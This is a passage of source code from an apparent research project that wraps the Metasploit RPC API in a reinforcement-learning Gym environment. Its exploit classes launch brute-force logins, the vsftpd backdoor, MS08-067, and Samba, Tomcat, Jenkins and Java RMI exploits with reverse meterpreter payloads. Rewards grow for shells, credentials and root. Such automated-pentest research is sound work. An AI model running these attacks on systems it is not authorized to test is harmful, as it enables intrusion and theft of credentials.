98 | self.req_access = None 99 | self.req_os = None 100 | self.req_version = None 101 | super(Exploit, self).__init__( 102 | self.name, self.target, self.req_access, self.req_os, self.req_version 103 | ) 104 | 105 | def execute(self, client, host, port=445): 106 | """ 107 | :param client: metasploit client object 108 | :param host: string representing IP of the target 109 | :param port: default port 445 110 | :return: 111 | """ 112 | exploit = client.modules.use("auxiliary", "scanner/smb/smb_login") 113 | exploit["RHOSTS"] = host 114 | exploit["RPORT"] = port 115 | exploit[ 116 | "USERPASS_FILE" 117 | ] = "/usr/share/metasploit-framework/data/wordlists" # TODO: This should be detected based on metasploit rpc server 118 | job_info = exploit.execute() 119 | wait_for_job_completion(job_info, client) 120 | 121 | 122 | class Telnet_Bruteforce(Exploit): 123 | """port 23 bruteforce 124 | https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/telnet/telnet_login.rb 125 | """ 126 | 127 | def __init__(self, target=(0, 0)): 128 | self.name = "Telnet_Bruteforce" 129 | self.service = "telnet" 130 | self.target = target 131 | self.req_access = None 132 | self.req_os = None 133 | self.req_version = None 134 | super(Exploit, self).__init__( 135 | self.name, self.target, self.req_access, self.req_os, self.req_version 136 | ) 137 | 138 | def execute(self, client, host, port=23): 139 | """ 140 | :param client: metasploit client object 141 | :param host: string representing IP of the target 142 | :param port: default port 23 143 | :return: 144 | """ 145 | exploit = client.modules.use("auxiliary", "scanner/telnet/telnet_login") 146 | exploit["RHOSTS"] = host 147 | exploit["RPORT"] = port 148 | exploit[ 149 | "USERPASS_FILE" 150 | ] = "/usr/share/metasploit-framework/data/wordlists" # TODO: This should be detected based on metasploit rpc server 151 | job_info = exploit.execute() 152 | wait_for_job_completion(job_info, client) 153 | 154 | 155 | class
VSFTPD(Exploit): 156 | """use exploit/unix/ftp/vsftpd_234_backdoor 157 | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb 158 | 159 | Args: 160 | Exploit ([type]): vsftpd 2.3.4 port 21 161 | 162 | Raises: 163 | NotImplementedError: [description] 164 | """ 165 | 166 | def __init__(self, target=(0, 0)): 167 | self.name = "VSFTPD" 168 | self.service = "ftp" 169 | self.target = target 170 | self.req_access = None 171 | self.req_os = "unix" 172 | self.req_version = None 173 | super(Exploit, self).__init__( 174 | self.name, self.target, self.req_access, self.req_os, self.req_version 175 | ) 176 | 177 | def execute(self, client, host, port=21): 178 | """ 179 | :param client: metasploit client object 180 | :param host: string representing IP of the target 181 | :param port: default port 21 182 | :return: 183 | """ 184 | exploit = client.modules.use("exploit", "unix/ftp/vsftpd_234_backdoor") 185 | exploit["RHOSTS"] = host 186 | exploit["RPORT"] = port 187 | job_info = exploit.execute(payload="cmd/unix/interact") 188 | wait_for_job_completion(job_info, client) 189 | 190 | 191 | class JavaRMIServer(Exploit): 192 | """Java RMI server exploit 193 | https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/multi/misc/java_rmi_server.rb 194 | Args: 195 | Exploit ([type]): [description] 196 | """ 197 | 198 | def __init__(self, target=(0, 0)): 199 | self.name = "Java_RMI_Server" 200 | self.service = "http" 201 | self.target = target 202 | self.req_access = None 203 | self.req_os = None 204 | self.req_version = None 205 | super(Exploit, self).__init__( 206 | self.name, self.target, self.req_access, self.req_os, self.req_version 207 | ) 208 | 209 | def execute(self, client, host, port=1099): 210 | """ 211 | :param client: metasploit client object 212 | :param host: string representing IP of the target 213 | :param port: default port 1099 214 | :return: 215 | """ 216 | exploit =
client.modules.use("exploit", "multi/misc/java_rmi_server") 217 | exploit["RHOSTS"] = host 218 | exploit["RPORT"] = port 219 | exploit.execute(cmd="java/meterpreter/reverse_https") 220 | 221 | 222 | class Ms08_067_Netapi(Exploit): 223 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms08_067_netapi.rb 224 | Classic SMB exploitation through a crafted RPC packet. Works great on Windows XP. 225 | 226 | Args: 227 | Exploit ([type]): [description] 228 | """ 229 | 230 | def __init__(self, target=(0, 0)): 231 | self.name = "ms08_067_netapi" 232 | self.service = "Microsoft-DS" 233 | self.target = target 234 | self.req_access = None 235 | self.req_os = "win" 236 | self.req_version = None 237 | super(Exploit, self).__init__( 238 | self.name, self.target, self.req_access, self.req_os, self.req_version 239 | ) 240 | 241 | def execute(self, client, host, port=445): 242 | """ 243 | :param client: metasploit client object 244 | :param host: string representing IP of the target 245 | :param port: default port 445 246 | :return: 247 | """ 248 | exploit = client.modules.use("exploit", "windows/smb/ms08_067_netapi") 249 | exploit["RHOSTS"] = host 250 | exploit["RPORT"] = port 251 | job_info = exploit.execute(cmd="windows/meterpreter/reverse_https") 252 | wait_for_job_completion(job_info, client) 253 | 254 | 255 | class ManageEngine_Auth_Upload(Exploit): 256 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/manageengine_auth_upload.rb 257 | 258 | HTTP upload that allows remote code execution on ManageEngine ServiceDesk 259 | 260 | TODO: Find a vulnerable copy of this for building environments. oy vey.
261 | Args: 262 | Exploit ([type]): [description] 263 | """ 264 | 265 | def __init__(self, target=(0, 0)): 266 | self.name = "ManageEngine_Auth_Upload" 267 | self.service = "http" 268 | self.target = target 269 | self.req_access = None 270 | self.req_os = None 271 | self.req_version = None 272 | super(Exploit, self).__init__( 273 | self.name, self.target, self.req_access, self.req_os, self.req_version 274 | ) 275 | 276 | def execute(self, client, host, port=8080): 277 | """ 278 | :param client: metasploit client object 279 | :param host: string representing IP of the target 280 | :param port: default port 8080 281 | :return: 282 | """ 283 | exploit = client.modules.use("exploit", "multi/http/manageengine_auth_upload") 284 | exploit["RHOSTS"] = host 285 | exploit["RPORT"] = port 286 | job_info = exploit.execute(cmd="java/meterpreter/reverse_https") 287 | wait_for_job_completion(job_info, client) 288 | 289 | 290 | class ApacheJamesExecution(Exploit): 291 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/smtp/apache_james_exec.rb 292 | 293 | 'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write" 294 | 295 | Args: 296 | Exploit ([type]): [description] 297 | """ 298 | 299 | def __init__(self, target=(0, 0)): 300 | self.name = "Apache_James_InsecureUserCreation" 301 | self.service = "smpt" 302 | self.target = target 303 | self.req_access = None 304 | self.req_os = "linux" 305 | self.req_version = None 306 | super(Exploit, self).__init__( 307 | self.name, self.target, self.req_access, self.req_os, self.req_version 308 | ) 309 | 310 | def execute(self, client, host, port=25): 311 | """ 312 | :param client: metasploit client object 313 | :param host: string representing IP of the target 314 | :param port: default port 25 (assumed SMTP default; previously copied from the ManageEngine action) 315 | :return: 316 | """ 317 | exploit = client.modules.use("exploit", "linux/smtp/apache_james_exec") 318 | exploit["RHOSTS"] = host 319 | exploit["RPORT"] = port 320 | job_info =
exploit.execute(cmd="java/meterpreter/reverse_https") 321 | wait_for_job_completion(job_info, client) 322 | 323 | 324 | class SambaUsermapScript(Exploit): 325 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/samba/usermap_script.rb 326 | 327 | 'Name' => "Samba "username map script" Command Execution" 328 | 329 | Args: 330 | Exploit ([type]): [description] 331 | """ 332 | 333 | def __init__(self, target=(0, 0)): 334 | self.name = "Samba_Usermap_Script" 335 | self.target = target 336 | self.service = "NetBIOS-SSN" 337 | self.req_access = None 338 | self.req_os = "multi" 339 | self.req_version = None 340 | super(Exploit, self).__init__( 341 | self.name, self.target, self.req_access, self.req_os, self.req_version 342 | ) 343 | 344 | def execute(self, client, host, port=139): 345 | """ 346 | :param client: metasploit client object 347 | :param host: string representing IP of the target 348 | :param port: default port 139 349 | :return: 350 | """ 351 | exploit = client.modules.use("exploit", "multi/samba/usermap_script") 352 | exploit["RHOSTS"] = host 353 | exploit["RPORT"] = port 354 | job_info = exploit.execute(cmd="java/meterpreter/reverse_https") 355 | wait_for_job_completion(job_info, client) 356 | 357 | 358 | class ApacheTomcatAuthenticationCodeExecution(Exploit): 359 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/tomcat_mgr_deploy.rb 360 | 361 | 'Name' => "Apache Tomcat Manager Application Deployer Authenticated Code Execution" 362 | 363 | Args: 364 | Exploit ([type]): [description] 365 | """ 366 | 367 | def __init__(self, target=(0, 0)): 368 | self.name = "Apache_Tomcat_Execution" 369 | self.target = target 370 | self.service = "http" 371 | self.req_access = None 372 | self.req_os = "multi" 373 | self.req_version = None 374 | super(Exploit, self).__init__( 375 | self.name, self.target, self.req_access, self.req_os, self.req_version 376 | ) 377 | 378 | def execute(self, client, 
host, port=8080): 379 | """ 380 | :param client: metasploit client object 381 | :param host: string representing IP of the target 382 | :param port: default port None 383 | :return: 384 | """ 385 | exploit = client.modules.use("exploit", "multi/http/tomcat_mgr_deploy") 386 | exploit["RHOSTS"] = host 387 | exploit["RPORT"] = port 388 | job_info = exploit.execute(cmd="java/meterpreter/reverse_https") 389 | wait_for_job_completion(job_info, client) 390 | 391 | 392 | class Jenkins_CI_Script_Java_Execution(Exploit): 393 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins_script_console.rb 394 | 395 | 'Name' => "Jenkins-CI Script-Console Java Execution" 396 | 397 | Args: 398 | Exploit ([type]): [description] 399 | """ 400 | 401 | def __init__(self, target=(0, 0)): 402 | self.name = "Jenkins_CI_Script_Console_Java_Execution" 403 | self.service = "http" 404 | self.target = target 405 | self.req_access = None 406 | self.req_os = "multi" 407 | self.req_version = None 408 | super(Exploit, self).__init__( 409 | self.name, self.target, self.req_access, self.req_os, self.req_version 410 | ) 411 | 412 | def execute(self, client, host, port=8080): 413 | """ 414 | :param client: metasploit client object 415 | :param host: string representing IP of the target 416 | :param port: default port 8080 417 | :return: 418 | """ 419 | exploit = client.modules.use("exploit", "multi/http/jenkins_script_console") 420 | exploit["RHOSTS"] = host 421 | exploit["RPORT"] = port 422 | job_info = exploit.execute(cmd="java/meterpreter/reverse_https") 423 | wait_for_job_completion(job_info, client) 424 | -------------------------------------------------------------------------------- /metasploit_gym/action/privilege_escalation.py: -------------------------------------------------------------------------------- 1 | """Privilege Escalation actions 2 | """ 3 | from .action import PrivilegeEscalation 4 | 5 | 6 | class GetSystem(PrivilegeEscalation): 7 | def 
__init__(self): 8 | """Metasploit literally just tries tons of stuff 9 | Including but not limited to this stuff https://cd6629.gitbook.io/ctfwriteups/windows-privesc 10 | aka services running as system with user-configurable startup binaries and stuff. 11 | 12 | https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/ 13 | 14 | """ 15 | super(GetSystem, self).__init__() 16 | self.req_platform = "windows" 17 | 18 | 19 | class GetRoot(PrivilegeEscalation): 20 | """wherein our 'action' is actually trying the linux suggester, parsing its contents to determine if any are viable, and running those that are 21 | 22 | aka the attached link shows documentation of a metasploit module that, when run, suggests a series of 23 | local privilege escalation techniques for linux, and whether it seems like the machine in question is vulnerable. we can then run any/all of these, 24 | basically the same as 'getsystem 25 | 26 | https://null-byte.wonderhowto.com/how-to/get-root-with-metasploits-local-exploit-suggester-0199463/ 27 | """ 28 | 29 | def __init__(self): 30 | super(GetRoot, self).__init__() 31 | self.req_platform = "linux" 32 | -------------------------------------------------------------------------------- /metasploit_gym/action/scan.py: -------------------------------------------------------------------------------- 1 | """Scanning actions 2 | """ 3 | from .action import Scan 4 | from pymetasploit3.msfconsole import MsfRpcConsole 5 | from pymetasploit3.msfrpc import MsfRpcMethod 6 | import time 7 | 8 | 9 | class PortScan(Scan): 10 | """The port scan will be our only scan, at first. 11 | It will represent the biggest, heaviest, and dumbest scan metasploit has. 12 | All ports, all services, looking for version numbers. It will be capable of giving us a "full starting state" 13 | of any machine we currently have subnet access to. 
14 | """ 15 | 16 | def __init__(self, target=(0, 0)): 17 | self.name = "PortScan" 18 | self.target = target 19 | self.req_access = None 20 | self.req_os = None 21 | self.req_version = None 22 | super(Scan, self).__init__( 23 | self.name, self.target, self.req_access, self.req_os, self.req_version 24 | ) 25 | 26 | def execute(self, client, host): 27 | """ 28 | Using the metasploit client, perform the action required 29 | TODO: Hold until you can confirm the action is completed to allow the calling function to observe state 30 | :param client: a metasploit client that can have the action run 31 | :return: 32 | """ 33 | c_id = client.call(MsfRpcMethod.ConsoleCreate)["id"] 34 | client.consoles.console(c_id).write(f"db_nmap {host}\n") 35 | out = client.consoles.console(c_id).read()["data"] 36 | timeout = 150 37 | counter = 0 38 | while counter < timeout: 39 | out += client.consoles.console(c_id).read()["data"] 40 | if "Nmap done" in out: 41 | break 42 | time.sleep(1) 43 | counter += 1 44 | -------------------------------------------------------------------------------- /metasploit_gym/host/network.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | 3 | from ..action.action import Exploit 4 | from .utils import SERVICES_TCP, REWARDS 5 | 6 | 7 | class Network: 8 | """Collect of Hosts objects, with helper functions for comparing them 9 | """ 10 | def __init__(self, max_subnets, max_hosts_per_subnet): 11 | self.hosts = [] 12 | self.max_subnets = max_subnets 13 | self.max_hosts_per_subnet = max_hosts_per_subnet 14 | self.num_exploits = len(Exploit.__subclasses__()) 15 | self.host_vector_size = self.calculate_host_vector_size() 16 | 17 | def max_reward(self): 18 | """Returns the maximum reward. Currently this is configured to be gaining root access to a host. 
19 | Configurable in utils.py 20 | 21 | Returns: 22 | int: The value of 'root' in the Rewards dictionary 23 | """ 24 | return REWARDS["root"] 25 | 26 | def check_host_exists(self, board_address): 27 | """Checks if board address represents a new host or one already occupied. 28 | 29 | Args: 30 | board_address (tuple): (subnet, host) board address 31 | 32 | Returns: 33 | bool: True if the Network object knows about the machine, False otherwise 34 | """ 35 | for host in self.hosts: 36 | if host.board_address == board_address: 37 | return True 38 | # only report a miss after every known host has been checked 39 | return False 40 | 41 | def compare_updated_host(self, updated_host): 42 | """Pulls clean data from Metasploit's database to see if the last action earned 43 | any reward for the host 44 | 45 | Args: 46 | updated_host (Host): New Host object to be compared to the network's current objects 47 | 48 | Raises: 49 | ValueError: Raised if the host is new and can't be compared to old data 50 | 51 | Returns: 52 | int: Reward earned on this host since the previous observation 53 | """ 54 | for host in self.hosts: 55 | if host.board_address == updated_host.board_address: 56 | reward = 0 57 | new_services = updated_host.service_count - host.service_count 58 | if new_services > 0: 59 | reward += new_services * REWARDS["services"] 60 | new_vulns = updated_host.vuln_count - host.vuln_count 61 | if new_vulns > 0: 62 | reward += new_vulns * REWARDS["vulns"] 63 | if updated_host.credentialed_access and not host.credentialed_access: 64 | # that's new creds 65 | reward += REWARDS["creds"] 66 | new_loot = updated_host.loot_count - host.loot_count 67 | if new_loot > 0: 68 | reward += new_loot * REWARDS["loot"] 69 | if updated_host.open_console and not host.open_console: 70 | reward += REWARDS["shell"] 71 | if updated_host.meterpreter_shell and not host.meterpreter_shell: 72 | reward += REWARDS["meterpreter"] 73 | return reward 74 | raise ValueError("Cannot compare updated host, this host is new") 75 | 76 | def update_host(self, updated_host): 77 | """After reward has been accounted for, update Host
list with new host 78 | 79 | Args: 80 | updated_host (Host): Most recent Host constructed from Metasploit database 81 | """ 82 | for i in range(len(self.hosts)): 83 | if self.hosts[i].board_address == updated_host.board_address: 84 | self.hosts[i] = updated_host 85 | 86 | def calculate_host_vector_size(self): 87 | """Quick math to calculate the desired size of our host vector 88 | 89 | Returns: 90 | int: Size of a flat host vector 91 | """ 92 | operating_systems = 2 93 | loot_slots = 1 # only one kind of loot for our purposes 94 | cred_slots = 1 # only one kind of cred for our purposes 95 | shell_types = 2 # regular and meterpreter 96 | privilege_levels = 5 97 | return ( 98 | self.max_subnets 99 | + self.max_hosts_per_subnet 100 | + operating_systems 101 | + len(SERVICES_TCP) 102 | + self.num_exploits 103 | + loot_slots 104 | + cred_slots 105 | + shell_types 106 | + privilege_levels 107 | ) 108 | 109 | def add_host(self, host): 110 | """Calculate rewards of host 111 | 112 | Args: 113 | host (Host): Host to have its rewards calculated 114 | 115 | Raises: 116 | TypeError: Raised if object is not of type Host 117 | ValueError: Raised if host has already been accounted for 118 | 119 | Returns: 120 | int: Reward amount of host 121 | """ 122 | reward = 0 123 | if not isinstance(host, Host): 124 | raise TypeError("Cannot add object to network unless it's of type Host") 125 | else: 126 | for current_host in self.hosts: 127 | if current_host.ip_address == host.ip_address: 128 | raise ValueError("Host is already added") 129 | new_services = host.service_count 130 | if new_services > 0: 131 | reward += new_services * REWARDS["services"] 132 | new_vulns = host.vuln_count 133 | if new_vulns > 0: 134 | reward += new_vulns * REWARDS["vulns"] 135 | if host.credentialed_access: 136 | reward += REWARDS["creds"] 137 | new_loot = host.loot_count 138 | if new_loot > 0: 139 | reward += new_loot * REWARDS["loot"] 140 | if host.open_console: 141 | reward += REWARDS["shell"] 142 | if 
host.meterpreter_shell: 143 | reward += REWARDS["meterpreter"] 144 | self.hosts.append(host) 145 | return reward 146 | 147 | def vectorize(self): 148 | if self.hosts == []: 149 | return np.zeros( 150 | ( 151 | self.calculate_host_vector_size(), 152 | self.max_subnets * self.max_hosts_per_subnet, 153 | ) 154 | ) 155 | array_list = [ 156 | self._network_tensor(self.hosts), 157 | self._os_tensor(self.hosts), 158 | self._services_tensor(self.hosts), 159 | self._vulns_tensor(self.hosts), 160 | self._loot_tensor(self.hosts), 161 | self._creds_tensor(self.hosts), 162 | self._shells_tensor(self.hosts), 163 | self._privilege_tensor(self.hosts), 164 | ] 165 | network_vector = np.concatenate(array_list) 166 | return network_vector 167 | 168 | def _services_tensor(self, hosts): 169 | """ 170 | 171 | :param hosts: 172 | :return: 173 | """ 174 | services_list = sorted(hosts[0].services.keys()) 175 | port_count = len(hosts[0].services) 176 | service_tensor = np.zeros((port_count, len(hosts))) 177 | for i in range(len(hosts)): 178 | host = hosts[i] 179 | for j in range(len(services_list)): 180 | port = services_list[j] 181 | if host.services[port]["status"] == True: 182 | service_tensor[j, i] = 1.0 183 | return service_tensor 184 | 185 | def _network_tensor(self, hosts): 186 | """ 187 | generate network 188 | """ 189 | # TODO: handle lookups for larger subnet amounts 190 | network_tensor = np.zeros( 191 | (self.max_subnets + self.max_hosts_per_subnet, len(hosts)) 192 | ) 193 | return network_tensor 194 | 195 | def _os_tensor(self, hosts): 196 | os_tensor = np.zeros( 197 | (2, len(hosts)) 198 | ) # two OSs, first is Windows second is Linux 199 | for i in range(len(hosts)): 200 | host = hosts[i] 201 | os_tensor[1, i] = 1.0 # setup Linux 202 | return os_tensor 203 | 204 | def _vulns_tensor(self, hosts): 205 | vulns_tensor = np.zeros((len(Exploit.__subclasses__()), len(hosts))) 206 | return vulns_tensor 207 | 208 | def _loot_tensor(self, hosts): 209 | loot_tensor = np.zeros((1, 
len(hosts))) 210 | for i in range(len(hosts)): 211 | host = hosts[i] 212 | loot_tensor[0, i] = host.loot_count 213 | return loot_tensor 214 | 215 | def _creds_tensor(self, hosts): 216 | cred_tensor = np.zeros((1, len(hosts))) 217 | for i in range(len(hosts)): 218 | host = hosts[i] 219 | if host.has_creds: 220 | cred_tensor[0, i] = 1.0 221 | return cred_tensor 222 | 223 | def _shells_tensor(self, hosts): 224 | shell_tensor = np.zeros((2, len(hosts))) 225 | for i in range(len(hosts)): 226 | host = hosts[i] 227 | if host.open_console: 228 | shell_tensor[0, i] = 1.0 229 | if host.meterpreter_shell: 230 | shell_tensor[1, i] = 1.0 231 | return shell_tensor 232 | 233 | def _privilege_tensor(self, hosts): 234 | privilege_tensor = np.zeros((5, len(hosts))) 235 | return privilege_tensor 236 | 237 | 238 | class Host: 239 | """A single host in the network 240 | 241 | NOTE: This represents the current state of the machine as observed by the agent, and not the 242 | TOTAL state of the machine. 243 | 244 | The host will keep track of the following properties: 245 | board_address [tuple] - e.g (0, 1) indicating subnet 0 and host 1. This will allow us to construct a matrix 246 | of what machines can communicate with what other machines so the agent can learn to understand pivoting 247 | 248 | ip_address [str] - e.g 127.0.0.1 this will indicate the actual address of the machine that metasploit can use to run exploits 249 | 250 | services [dict] - will start with a dict of all possible services as keys. the values will then be metasploit dictionaries representing service info 251 | 252 | vulns [dict] - will start with list of all vuln as keys, the values will then be metasploit dictionaries representing the vulns 253 | 254 | loots int - the number of loots acquired. 255 | 256 | creds - a dictionary of the level of access for creds, set to true if we have credentials with that access. 
also a reference to a file containing the login creds 257 | """ 258 | 259 | def __init__( 260 | self, 261 | board_address, 262 | ip_address, 263 | services, 264 | vulns=None, 265 | loot=None, 266 | creds=None, 267 | console=None, 268 | session=None, 269 | vector_size=None, 270 | ): 271 | self.board_address = board_address 272 | self.ip_address = ip_address 273 | self.services = self._construct_services(services) 274 | self.vector_size = vector_size 275 | self.loots = len(loot) if loot else 0 # loot defaults to None 276 | self.has_creds = 1 if creds else 0 277 | self.has_open_console = 1 if console else 0 # denotes regular command shell 278 | self.has_open_session = 1 if session else 0 # denotes meterpreter 279 | self.vulns = vulns if vulns is not None else [] # keeps vuln_count usable 280 | 281 | def _construct_services(self, services): 282 | """Use SERVICES_TCP in utils to create a dictionary of top services 283 | 284 | Args: 285 | services (list): Metasploit service dictionaries reported for this host 286 | 287 | Returns: 288 | dict: Dictionary representing active services in the host 289 | """ 290 | services_tcp = {port: dict(info) for port, info in SERVICES_TCP.items()} # per-host copy; .copy() would share the nested dicts 291 | for service in services: 292 | if service["port"] in services_tcp: 293 | target_service = services_tcp[service["port"]] 294 | if service["name"] == target_service["service"]: 295 | target_service["status"] = True 296 | return services_tcp 297 | 298 | @property 299 | def service_count(self): 300 | active_services = 0 301 | for port in self.services.keys(): 302 | service = self.services[port] 303 | if service["status"]: 304 | active_services += 1 305 | return active_services 306 | 307 | @property 308 | def vuln_count(self): 309 | return len(self.vulns) 310 | 311 | @property 312 | def credentialed_access(self): 313 | return self.has_creds 314 | 315 | @property 316 | def loot_count(self): 317 | return self.loots 318 | 319 | @property 320 | def meterpreter_shell(self): 321 | return self.has_open_session 322 | 323 | @property 324 | def open_console(self): 325 | return self.has_open_console 326 | 327 | def vectorize(self): 328 | 
vector = np.zeros(self.vector_size, dtype=np.float32) 329 | return vector 330 | -------------------------------------------------------------------------------- /metasploit_gym/host/utils.py: -------------------------------------------------------------------------------- 1 | SERVICES_TCP = { 2 | 80: {"service": "http", "status": False}, 3 | 23: {"service": "telnet", "status": False}, 4 | 443: {"service": "http", "status": False}, 5 | 21: {"service": "ftp", "status": False}, 6 | 22: {"service": "ssh", "status": False}, 7 | 25: {"service": "smpt", "status": False}, 8 | 3389: {"service": "ms-term-server", "status": False}, 9 | 110: {"service": "POP3", "status": False}, 10 | 445: {"service": "Microsoft-DS", "status": False}, 11 | 139: {"service": "NetBIOS-SSN", "status": False}, 12 | 5432: {"service": "postgresql", "status": False}, 13 | } 14 | 15 | REWARDS = { 16 | "vulns": 10, 17 | "services": 5, 18 | "creds": 15, 19 | "loot": 1, 20 | "root": 20, 21 | "shell": 5, 22 | "meterpreter": 8, 23 | } 24 | -------------------------------------------------------------------------------- /metasploit_gym/metasploit_env.py: -------------------------------------------------------------------------------- 1 | from gym import Env, spaces 2 | from gym.utils import seeding 3 | from pymetasploit3.msfrpc import MsfRpcClient 4 | from .action.action import Action, Exploit, Scan 5 | from .action.exploit import * 6 | from .action.scan import * 7 | from .host.network import Host, Network 8 | from dotenv import load_dotenv 9 | import os 10 | import time 11 | 12 | 13 | class MetasploitEnv(Env): 14 | def __init__(self): 15 | """ 16 | Will have all the required gym functionality and then also necessary stuff for our other two environments 17 | """ 18 | self.action_space = None # Space object corresponding to valid actions 19 | # Space object corresponding to valid observations 20 | self.observation_space = None 21 | self.reward_range = None # A tuple corresponding to the min and max possible 
rewards (default [-inf, +inf] ) 22 | 23 | def step(self, action): 24 | """Run one timestep of the environment's dynamics. When end of 25 | episode is reached, you are responsible for calling `reset()` to reset this 26 | environment's state. 27 | 28 | Accepts an action and returns a tuple (observation, reward, done, info). 29 | 30 | Args: 31 | action (object): An action provided by the agent 32 | 33 | Returns: 34 | observation (object): agent's observation of the current environment 35 | reward (float): amount of reward returned after previous action 36 | done (bool): whether the episode has ended, in which case further step() calls return undefined results 37 | info (dict): Returns auxiliary diagnostic info 38 | """ 39 | raise NotImplementedError 40 | 41 | def reset(self): 42 | """Resets the environment to an initial state and returns an initial observation. 43 | 44 | Note that this function should not reset the environment's random number generators; 45 | random variables in the environment's state should be sampled independently between multiple calls to `reset()`. In 46 | other words each call of `reset()` should yield an environment suitable for a new episode, independent 47 | of previous episodes. 48 | 49 | Returns: 50 | observation (object): the initial observation. 51 | """ 52 | raise NotImplementedError 53 | 54 | def render(self, mode="human"): 55 | """Renders the environment. 56 | 57 | The set of supported modes varies per environment. By convention, if mode is: 58 | 59 | - human: render to the current display or terminal and return nothing for human consumption. 60 | - rgb_array: Return a numpy.ndarray with shape (x, y, 3), representing RGB values for x-by-y pixel image, suitable 61 | for turning into a video. 62 | - ansi: Return a string (str) or StringIO.StringIO containing a terminal-style text representation 63 | 64 | Note: 65 | Make sure that your class's metadata `render.modes` key includes 66 | the list of supported modes.
It's recommended to call super() in implementations 67 | to use the functionality of this method 68 | 69 | Example: 70 | class MyEnv(Env): 71 | metadata = {'render.modes': ['human', 'rgb_array']} 72 | def render(self, mode='human'): 73 | if mode == 'rgb_array': 74 | return np.array(...) # return RGB frame suitable for video 75 | elif mode == 'human': 76 | ... # pop up a window and render 77 | else: 78 | super(MyEnv, self).render(mode=mode) # just raise an exception 79 | 80 | """ 81 | raise NotImplementedError 82 | 83 | def close(self): 84 | """Override close in your subclass to perform necessary cleanup. 85 | 86 | Environments will automatically close() themselves when garbage collected or on program exit. 87 | """ 88 | raise NotImplementedError 89 | 90 | def seed(self, seed=None): 91 | """Sets the seed for this env's random number generator. 92 | 93 | Note: 94 | Some environments use multiple psuedorandom number generators. 95 | We want to capture all such seeds used in order to ensure that there aren't 96 | accidental correlations between multiple generators. 97 | 98 | Returns: 99 | list: Returns the list of seeds used in this env's random number generators. The first 100 | value in the list should be the "main" seed, or the value which a reproducer should pass to 'seed'. Often, 101 | the main seed equals the provided 'seed', but this won't be true if seed=None, for example. 102 | 103 | Args: 104 | seed ([type], optional): [description]. Defaults to None. 
105 | 106 | Raises: 107 | NotImplementedError: [description] 108 | """ 109 | raise NotImplementedError 110 | 111 | 112 | class MetasploitNetworkEnv(MetasploitEnv): 113 | def __init__( 114 | self, reset_function, max_subnets=1, max_hosts_per_subnet=1, total_hosts=1 115 | ): 116 | super().__init__() 117 | load_dotenv() 118 | self.environment_reset_function = reset_function 119 | self.client = self.create_client() 120 | self.client.db.workspaces.add("metasploitgym") 121 | self.client.db.workspaces.set("metasploitgym") 122 | self.total_hosts = total_hosts 123 | # TODO: Replace this with CIDR address later 124 | self.target_host = os.getenv("TARGET_HOST", default=None) 125 | if self.target_host is None: 126 | raise ValueError( 127 | "Set TARGET_HOST in .env to use the metasploit network env" 128 | ) 129 | self.host_dict = {self.target_host: (0, 0)} # map IP to board address 130 | self.tcp_services = dict() # list of all services, and a 1 if it's up 131 | self.udp_services = dict() 132 | self.privileges = dict() 133 | self.loot = dict() 134 | self.max_subnets = max_subnets 135 | self.max_hosts_per_subnet = max_hosts_per_subnet 136 | self.action_space = FlatActionSpace( 137 | max_subnets=max_subnets, max_hosts_per_subnet=max_hosts_per_subnet 138 | ) 139 | self.network = Network( 140 | max_subnets=max_subnets, 141 | max_hosts_per_subnet=max_hosts_per_subnet, 142 | ) 143 | self.observation_space = spaces.Box( 144 | low=0, high=self.network.max_reward(), shape=self.network.vectorize().shape 145 | ) 146 | 147 | def create_client(self): 148 | metasploit_pass = os.getenv("METASPLOIT_PASSWORD", default=None) 149 | metasploit_port = os.getenv("METASPLOIT_PORT", default=None) 150 | metasploit_host = os.getenv("METASPLOIT_HOST", default=None) 151 | 152 | if ( 153 | metasploit_host is None 154 | or metasploit_port is None 155 | or metasploit_pass is None 156 | ): 157 | raise ValueError( 158 | "Please include a .env file with METASPLOIT_PASSWORD, METASPLOIT_PORT, and METASPLOIT_HOST set to the
values of the msgrpc service" 159 | ) 160 | client = MsfRpcClient( 161 | metasploit_pass, server=metasploit_host, port=metasploit_port, ssl=True 162 | ) 163 | return client 164 | 165 | def calculate_board_address(self, ip): 166 | if ip in self.host_dict: 167 | return self.host_dict[ip] 168 | proposed_subnet = ip.split(".")[-2] 169 | amount_in_subnet = 0 170 | subnet_idx = None 171 | highest_subnet = 0 172 | for known_ip in self.host_dict.keys(): # do not shadow the `ip` argument 173 | if (self.host_dict[known_ip])[0] > highest_subnet: 174 | highest_subnet = self.host_dict[known_ip][0] 175 | if known_ip.split(".")[-2] == proposed_subnet: 176 | amount_in_subnet += 1 177 | subnet_idx = self.host_dict[known_ip][0] # first part of tuple 178 | if amount_in_subnet >= self.max_hosts_per_subnet: # subnet is already full 179 | return None 180 | elif subnet_idx is None and highest_subnet >= self.max_subnets - 1: # no subnet slots left 181 | return None 182 | else: 183 | if subnet_idx is None: 184 | subnet_idx = highest_subnet + 1 185 | return (subnet_idx, 0) 186 | else: 187 | return (subnet_idx, amount_in_subnet) 188 | 189 | ### see if we have any slots left in this subnet 190 | 191 | def update_env(self): 192 | # get hosts.
